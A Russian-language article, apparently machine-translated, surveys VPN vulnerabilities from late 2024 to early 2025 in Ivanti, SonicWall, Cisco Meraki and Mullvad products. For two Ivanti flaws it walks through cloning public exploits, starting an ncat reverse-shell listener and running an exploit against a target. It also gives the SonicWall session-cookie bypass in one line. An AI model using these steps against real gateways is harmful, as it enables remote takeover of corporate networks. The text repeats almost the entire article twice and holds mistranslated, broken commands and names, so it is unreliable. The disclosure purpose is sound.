VPN-сервисы призваны быть инструментом защиты, но реальность рисует совершенно иную картину. Практически ежедневно мы видим, как хакеры эксплуатируют уязвимости как в частных, так и в корпоративных VPN. Если вы думаете, что ваш VPN-сервис вас защищает, возможно, пора передумать.
В этой статье мы разберем основные уязвимости VPN конца 2024 — начала 2025 года и покажем, почему ваше доверие к ним может быть неоправданным.
В апреле 2025 года специалисты по безопасности обнаружили CVE-2025-22457 — критическую уязвимость переполнения буфера в стеке без аутентификации, затрагивающую устройства Ivanti Connect Secure (ICS) и Pulse Connect Secure VPN. Эта уязвимость затрагивает устройства ICS версии 22.7R2.5 и более ранние, Pulse Connect Secure 9.1x (поддержка которой прекращена в декабре 2024 года), а также шлюзы Ivanti Policy Secure и ZTA.
Особую обеспокоенность этой уязвимостью вызывает тот факт, что, по данным Help Net Security, она «ранее считалась непригодной для эксплуатации». Изначально компания Ivanti оценила её как переполнение буфера, ограничиваясь точками и цифрами, и пришла к выводу, что она не пригодна для удалённого выполнения кода. Однако китайская APT-группа, временно обозначенная как UNC5221, в ходе «сложного процесса» обнаружила, что уязвимость действительно может быть использована в качестве оружия.
Уже разработано несколько прототипов эксплойтов, доступных на GitHub. Давайте используем реализацию sfewer-r7 в качестве примера.
Вы можете загрузить и клонировать репозиторий с помощью команды ниже.
kali> git clone https://github.com/sfewer-r7/CVE-2025-22457
Перейдите в новый каталог.
кали> cd CVE-2025-22457
Чтобы воспользоваться уязвимостью, нам нужно запустить прослушиватель netcat для перехвата обратного шелла:
kali> ncat -lnvkp 8080
Затем запустите скрипт эксплойта против уязвимой цели:
кали> рубин CVE-2025-22457.rb -t 192.168.86.111 -p 443 –lhost 192.168.86.35 –lport 8080
Скрипт попытается выполнить атаку ASLR методом подбора, пробуя разные базовые адреса для libdsplibs.so:
Иллюстрация предоставлена sfewer-r7
В случае успеха вы получите обратную оболочку с привилегиями пользователя «nr»:
Иллюстрация предоставлена sfewer-r7
В апреле 2025 года Shodan выявила более 4000 потенциально уязвимых систем, подверженных атакам из Интернета.
CVE-2024-53704 — критическая уязвимость обхода аутентификации в реализации SSL VPN от SonicWall, затрагивающая версии SonicOS 7.1.x (до 7.1.1-7058), 7.1.2-7019 и 8.0.0-8035. Эта уязвимость позволяет неаутентифицированному удалённому злоумышленнику перехватывать активные сеансы VPN, отправляя специально созданные сеансовые cookie-файлы в кодировке Base64, фактически обходя многофакторную аутентификацию (MFA) и получая полный доступ к внутренним сетям.
Уязвимость была ответственно раскрыта компанией Computest Security 5 ноября 2024 года. SonicWall выпустила исправление 7 января 2025 года, но неудивительно, что многие организации так и не получили исправления спустя недели и месяцы.
Несмотря на техническую сложность, необходимую для обнаружения уязвимости, финальный эксплойт предельно прост: достаточно закодировать 32 нулевых байта в формате base64 и поместить их в cookie-файл подкачки GET-запроса. Вот и всё. Неудивительно, что злоумышленники поспешили использовать его в своих целях, как только PoC-код стал доступен публике.
PoC:
По состоянию на середину февраля 2025 года епископ Фокс сообщил, что более 4500 конечных точек SonicWall VPN все еще уязвимы.
В январе 2025 года компания Ivanti раскрыла две критические уязвимости, влияющие на ее продукты Connect Secure, Policy Secure и шлюз ZTA:
Эти уязвимости затронули Ivanti Connect Secure до версии 22.7R2.5, Ivanti Policy Secure до версии 22.7R1.2 и Ivanti Neurons для шлюзов ZTA до версии 22.7R2.3.
Чтобы продемонстрировать эту уязвимость, мы можем использовать другой эксплойт из sfewer-r7, который доступен здесь: https://github.com/sfewer-r7/CVE-2025-0282
В этом PoC реализована ROP-цепочка, разработанная для Ivanti Connect Secure 22.7r2.4. Ни одна другая версия не может быть использована без предварительного создания соответствующей ROP-цепочки для этой целевой версии.
Этот PoC содержит полезную нагрузку, которая выполняет команду операционной системы для создания временного файла в целевой системе. Это позволяет определить, что эксплойт сработал успешно. Выполнение кода осуществляется с привилегиями пользователя без прав root №.
Иллюстрация предоставлена sfewer-r7
Из этого примера видно, что эксплойт совершил 190 неудачных попыток и увенчался успехом на 191-й.
Компания Cisco раскрыла уязвимость CVE-2025-20212 — высокий уровень серьёзности, связанный с отказом в обслуживании (DoS), затрагивающий VPN-сервер AnyConnect в устройствах серий Meraki MX и Meraki Z. Уязвимость возникла из-за того, что «переменная не была инициализирована при установлении сеанса SSL VPN».
В отличие от уязвимостей Ivanti, для эксплуатации этой уязвимости требуются действительные учётные данные пользователя VPN. Злоумышленник с такими учётными данными может использовать поддельные атрибуты при установлении сеанса SSL VPN, что приведёт к перезапуску VPN-сервера AnyConnect и вынудит удалённых пользователей инициировать новые VPN-подключения.
По данным Cisco, «длительная атака может помешать установлению новых подключений SSL VPN», хотя сервер автоматически восстановится после прекращения атаки.
X41 D-Sec GmbH, авторитетная консалтинговая компания в области кибербезопасности, завершила тщательное тестирование на проникновение приложения Mullvad VPN на нескольких платформах (настольных компьютерах, iOS и Android). В ходе проверки были выявлены три проблемы высокого уровня серьёзности, включая критическую уязвимость (CVE-2024-55884, CVSS 9.0), связанную с альтернативными стеками сигналов, которая может привести к повреждению памяти и записи данных за пределами выделенного буфера в куче.
Обзор безопасности Mullvad VPN от X41 D-Sec GmbH
Самая серьёзная проблема, MLLVD-CR-24-01, возникает из-за недостаточного размера стека для обработчиков исключений в exception_logging/unix.rs. При определённых условиях злоумышленник может удалённо инициировать сигнал таким образом, что это приведёт к повреждению памяти из-за коллизий между стеком alt и кучей.
Уязвимости VPN, обнаруженные в конце 2024 — начале 2025 года, демонстрируют, что эти критически важные компоненты безопасности остаются главными целями для изощренных злоумышленников.
В этой статье мы разберем основные уязвимости VPN конца 2024 — начала 2025 года и покажем, почему ваше доверие к ним может быть неоправданным.
CVE-2025-22457 (переполнение стекового буфера в Ivanti Connect Secure/Pulse Connect Secure)
В апреле 2025 года специалисты по безопасности обнаружили CVE-2025-22457 — критическую уязвимость переполнения буфера в стеке без аутентификации, затрагивающую устройства Ivanti Connect Secure (ICS) и Pulse Connect Secure VPN. Эта уязвимость затрагивает устройства ICS версии 22.7R2.5 и более ранние, Pulse Connect Secure 9.1x (поддержка которой прекращена в декабре 2024 года), а также шлюзы Ivanti Policy Secure и ZTA.
Особую обеспокоенность этой уязвимостью вызывает тот факт, что, по данным Help Net Security, она «ранее считалась непригодной для эксплуатации». Изначально компания Ivanti оценила её как переполнение буфера, ограничиваясь точками и цифрами, и пришла к выводу, что она не пригодна для удалённого выполнения кода. Однако китайская APT-группа, временно обозначенная как UNC5221, в ходе «сложного процесса» обнаружила, что уязвимость действительно может быть использована в качестве оружия.
Эксплуатация
Уже разработано несколько прототипов эксплойтов, доступных на GitHub. Давайте используем реализацию sfewer-r7 в качестве примера.
Вы можете загрузить и клонировать репозиторий с помощью команды ниже.
kali> git clone https://github.com/sfewer-r7/CVE-2025-22457
Перейдите в новый каталог.
кали> cd CVE-2025-22457
Чтобы воспользоваться уязвимостью, нам нужно запустить прослушиватель netcat для перехвата обратного шелла:
kali> ncat -lnvkp 8080
Затем запустите скрипт эксплойта против уязвимой цели:
кали> рубин CVE-2025-22457.rb -t 192.168.86.111 -p 443 –lhost 192.168.86.35 –lport 8080
Скрипт попытается выполнить атаку ASLR методом подбора, пробуя разные базовые адреса для libdsplibs.so:
Иллюстрация предоставлена sfewer-r7
В случае успеха вы получите обратную оболочку с привилегиями пользователя «nr»:
Иллюстрация предоставлена sfewer-r7
В апреле 2025 года Shodan выявила более 4000 потенциально уязвимых систем, подверженных атакам из Интернета.
CVE-2024-53704 (обход аутентификации в SonicWall SSL VPN – SonicOS)
CVE-2024-53704 — критическая уязвимость обхода аутентификации в реализации SSL VPN от SonicWall, затрагивающая версии SonicOS 7.1.x (до 7.1.1-7058), 7.1.2-7019 и 8.0.0-8035. Эта уязвимость позволяет неаутентифицированному удалённому злоумышленнику перехватывать активные сеансы VPN, отправляя специально созданные сеансовые cookie-файлы в кодировке Base64, фактически обходя многофакторную аутентификацию (MFA) и получая полный доступ к внутренним сетям.
Уязвимость была ответственно раскрыта компанией Computest Security 5 ноября 2024 года. SonicWall выпустила исправление 7 января 2025 года, но неудивительно, что многие организации так и не получили исправления спустя недели и месяцы.
Несмотря на техническую сложность, необходимую для обнаружения уязвимости, финальный эксплойт предельно прост: достаточно закодировать 32 нулевых байта в формате base64 и поместить их в cookie-файл подкачки GET-запроса. Вот и всё. Неудивительно, что злоумышленники поспешили использовать его в своих целях, как только PoC-код стал доступен публике.
PoC:
По состоянию на середину февраля 2025 года епископ Фокс сообщил, что более 4500 конечных точек SonicWall VPN все еще уязвимы.
CVE-2025-0282 и CVE-2025-0283 (переполнение буфера на основе стека Ivanti Connect Secure)
В январе 2025 года компания Ivanti раскрыла две критические уязвимости, влияющие на ее продукты Connect Secure, Policy Secure и шлюз ZTA:
- CVE-2025-0282: Критическое переполнение стекового буфера (CVSS 9.0), допускающее неаутентифицированное удаленное выполнение кода.
- CVE-2025-0283: Опасная ошибка переполнения стекового буфера (CVSS 7.0), допускающая локальное повышение привилегий.
Эти уязвимости затронули Ivanti Connect Secure до версии 22.7R2.5, Ivanti Policy Secure до версии 22.7R1.2 и Ivanti Neurons для шлюзов ZTA до версии 22.7R2.3.
Эксплуатация
Чтобы продемонстрировать эту уязвимость, мы можем использовать другой эксплойт из sfewer-r7, который доступен здесь: https://github.com/sfewer-r7/CVE-2025-0282
В этом PoC реализована ROP-цепочка, разработанная для Ivanti Connect Secure 22.7r2.4. Ни одна другая версия не может быть использована без предварительного создания соответствующей ROP-цепочки для этой целевой версии.
Этот PoC содержит полезную нагрузку, которая выполняет команду операционной системы для создания временного файла в целевой системе. Это позволяет определить, что эксплойт сработал успешно. Выполнение кода осуществляется с привилегиями пользователя без прав root №.
Иллюстрация предоставлена sfewer-r7
Из этого примера видно, что эксплойт совершил 190 неудачных попыток и увенчался успехом на 191-й.
CVE-2025-20212 (уязвимость DoS-атаки Cisco Meraki AnyConnect VPN)
Компания Cisco раскрыла уязвимость CVE-2025-20212 — высокий уровень серьёзности, связанный с отказом в обслуживании (DoS), затрагивающий VPN-сервер AnyConnect в устройствах серий Meraki MX и Meraki Z. Уязвимость возникла из-за того, что «переменная не была инициализирована при установлении сеанса SSL VPN».
В отличие от уязвимостей Ivanti, для эксплуатации этой уязвимости требуются действительные учётные данные пользователя VPN. Злоумышленник с такими учётными данными может использовать поддельные атрибуты при установлении сеанса SSL VPN, что приведёт к перезапуску VPN-сервера AnyConnect и вынудит удалённых пользователей инициировать новые VPN-подключения.
По данным Cisco, «длительная атака может помешать установлению новых подключений SSL VPN», хотя сервер автоматически восстановится после прекращения атаки.
CVE-2024-55884 (запись за пределами допустимого диапазона Mullvad VPN из-за исчерпания стека сигналов)
X41 D-Sec GmbH, авторитетная консалтинговая компания в области кибербезопасности, завершила тщательное тестирование на проникновение приложения Mullvad VPN на нескольких платформах (настольных компьютерах, iOS и Android). В ходе проверки были выявлены три проблемы высокого уровня серьёзности, включая критическую уязвимость (CVE-2024-55884, CVSS 9.0), связанную с альтернативными стеками сигналов, которая может привести к повреждению памяти и записи данных за пределами выделенного буфера в куче.
Обзор безопасности Mullvad VPN от X41 D-Sec GmbH
Самая серьёзная проблема, MLLVD-CR-24-01, возникает из-за недостаточного размера стека для обработчиков исключений в exception_logging/unix.rs. При определённых условиях злоумышленник может удалённо инициировать сигнал таким образом, что это приведёт к повреждению памяти из-за коллизий между стеком alt и кучей.
Заключение
Уязвимости VPN, обнаруженные в конце 2024 — начале 2025 года, демонстрируют, что эти критически важные компоненты безопасности остаются главными целями для изощренных злоумышленников.
